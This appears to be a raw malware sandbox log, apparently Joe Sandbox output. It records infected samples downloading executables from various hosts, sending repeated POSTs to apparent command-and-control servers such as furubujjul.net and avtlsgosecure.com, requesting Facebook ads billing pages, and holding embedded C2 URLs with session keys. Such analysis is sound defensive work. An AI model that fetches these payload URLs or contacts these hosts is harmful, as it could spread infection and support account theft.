Source: global traffic HTTP traffic detected: GET /files/pe/pb1113.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: kkh.eiwagggg.com
Source: global traffic HTTP traffic detected: GET /upload/ChromeSetup.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: pelegisr.com
Source: global traffic HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /22.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: www.rukangiralawchambers.org
Source: global traffic HTTP traffic detected: GET /testermanmag/myownre/raw/main/explorer.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: github.com
Source: global traffic HTTP traffic detected: GET /jamesp.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: keziheritier.com
Source: global traffic HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /7.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: keziheritier.com
Source: global traffic HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jxgxe.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 246Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://erlmaqaee.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 355Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hbcgxocfi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 121Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qbaff.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qjfwyiswqf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 174Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uywhkxoed.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 264Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://osqxrahfo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 335Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ekwvv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 283Host: furubujjul.net
Source: global traffic HTTP traffic detected: GET /s.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.138.74.52
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gqesn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 146Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kmbcjpnhmn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 173Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vfnfj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 132Host: furubujjul.net
Source: global traffic HTTP traffic detected: GET /intersock.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 179.43.163.115
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ikrffkiyo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 359Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cluvur.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 298Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ogumtw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 231Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://penvasmsfn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 317Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yupxpeh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 279Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://elepmy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 367Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://musgiffp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 327Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mosxiihyx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 194Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://erwwlrd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 127Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rplmdlqvb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 121Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uxbnplb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 347Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ttkphlkd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 276Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://acwsosy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 158Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hhnjmhndyi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 331Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mumrxhscl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 348Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sbclkddt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 225Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gwduafudxk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 282Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oluukivxak.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 278Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://urtpdj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 163Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qcouemgwhe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iveusnelmb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 176Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://feguaryku.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 245Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xaxubvgaxp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 277Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hgtoajitw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qatdmt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 157Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://taycucfic.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 211Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yflhmtrc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sqpwbiet.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 327Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ecyhmxgsfc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 265Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mnbmwy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 210Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ouoadwsue.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 359Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://meodpejlxy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 212Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://otrdotvq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 362Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://thytbewb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 346Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cgrdihsvb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 204Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nubtbm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 340Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tsfbujs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 140Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ohjxgaebo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 133Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oqngiychus.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 223Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xmxbixt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 219Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rrmxi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ymvtebx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sxbykepfr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 165Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pkuitvuub.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 290Host: avtlsgosecure.com
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View IP Address: 172.67.203.213 172.67.203.213
Source: Joe Sandbox View IP Address: 172.67.203.213 172.67.203.213
Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://aaa.apiaaaeg.com/
Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://aaa.apiaaaeg.com/P
Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://aaa.apiaaaeg.com/Q
Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://aaa.apiaaaeg.com/T
Source: 2A57.exe, 00000008.00000002.646563677.000000000083A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://aaa.apiaaaeg.com/V
Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://aaa.apiaaaeg.com/check/?sid=203601&key=208a26f120e37e37bd82b4530154a948
Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://aaa.apiaaaeg.com/check/?sid=203601&key=208a26f120e37e37bd82b4530154a948SE
Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://aaa.apiaaaeg.com/check/?sid=203601&key=208a26f120e37e37bd82b4530154a948lE
Source: 2A57.exe, 00000008.00000002.617149584.0000000000562000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://aaa.apiaaaeg.com/check/safe
Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://aaa.apiaaaeg.com/check/safeaaeg.comu
Source: 2A57.exe, 00000008.00000002.617149584.0000000000562000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://aaa.apiaaaeg.com/check/safeeR
Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://aaa.apiaaaeg.com/check/safewQ
Source: 2A57.exe, 00000008.00000002.646563677.000000000083A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://aaa.apiaaaeg.com/f
Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://aaa.apiaaaeg.com:80/check/?sid=203601&key=208a26f120e37e37bd82b4530154a948bHU8
Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://aaa.apiaaaeg.com:80/check/safe
Source: 2A57.exe, 00000008.00000002.651334498.00000001400E2000.00000002.00000001.01000000.0000000A.sdmp, EAA.exe, 0000000C.00000002.651496776.00000001400E2000.00000002.00000001.01000000.0000000D.sdmp String found in binary or memory: http://aaa.aptpokmmooootmtmymuok.com/w.facebohttps://wwcebfSTPOGET/device-based/logination/x-www-for
Source: EAA.exe, 0000000C.00000003.557836455.0000000002483000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://avtlsgosecure.c24
Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmp, ECFD.exe, 00000009.00000002.636219136.000000000074B000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.603293768.000000000057C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 0000000F.00000000.503967031.0000000000C30000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000000F.00000002.521532194.0000000000E20000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://furubujjul.net/
Source: explorer.exe, 0000000F.00000000.503967031.0000000000C30000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000000F.00000002.521532194.0000000000E20000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://furubujjul.net/Mozilla/5.0
Source: ECFD.exe, 00000009.00000000.567462194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ECFD.exe, 00000009.00000002.598151437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ECFD.exe, 00000009.00000000.556782273.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
